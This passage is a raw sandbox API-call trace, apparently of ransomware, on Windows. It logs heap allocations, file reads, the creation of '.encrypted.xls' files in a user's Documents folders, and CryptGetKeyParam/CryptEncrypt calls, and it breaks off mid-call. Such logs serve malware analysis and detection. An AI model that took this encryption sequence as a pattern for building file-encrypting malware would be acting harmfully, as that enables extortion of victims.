out: hHeap=0x770000) returned 1 [0034.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0034.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0034.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0034.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0034.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791190 | out: hHeap=0x770000) returned 1 [0034.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0034.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0034.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791190 [0034.483] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\shrw")) returned 0x10 [0034.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791190 | out: hHeap=0x770000) returned 1 [0034.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791268 | out: hHeap=0x770000) returned 1 [0034.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0034.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0034.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0034.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0034.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0034.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0034.484] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.encrypted.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\shrw\\2ku7the4lqt.encrypted.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0034.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0034.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0034.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0034.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0034.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0034.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0034.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0034.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0034.484] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0034.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0034.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0034.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0034.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0034.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0034.485] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0034.485] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0034.485] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0034.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0034.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0034.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0034.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0034.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0034.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0034.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0034.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0034.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0034.485] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0034.485] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0034.487] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x2571, lpOverlapped=0x0) returned 1 [0034.488] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0034.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0034.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0034.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12571) returned 0x955018 [0034.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0034.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0034.489] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0034.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0034.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12571) returned 0x955018 [0034.490] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0034.490] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0034.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.490] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0034.490] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0034.490] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0034.491] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0034.491] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0034.491] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0034.491] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0034.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0034.492] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0034.492] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.492] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0034.492] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0034.492] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da2c8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2c8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0034.492] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0034.492] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0034.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0034.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9a8 [0034.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0034.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0034.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0034.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0034.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0034.493] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0034.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0034.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0034.493] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0034.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0034.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0034.493] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.493] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.493] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0034.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0034.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0034.493] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0034.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0034.493] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0034.493] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0034.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0034.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.493] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.493] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0034.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0034.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0034.494] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.494] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0034.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.494] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0034.494] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0034.494] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.494] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0034.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0034.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0034.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0034.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0034.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0034.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0034.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0034.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0034.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0034.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.494] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.494] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0034.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0034.496] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0034.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0034.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0034.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0034.496] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x12571, dwBufLen=0x0 | out: pbData=0x0*, 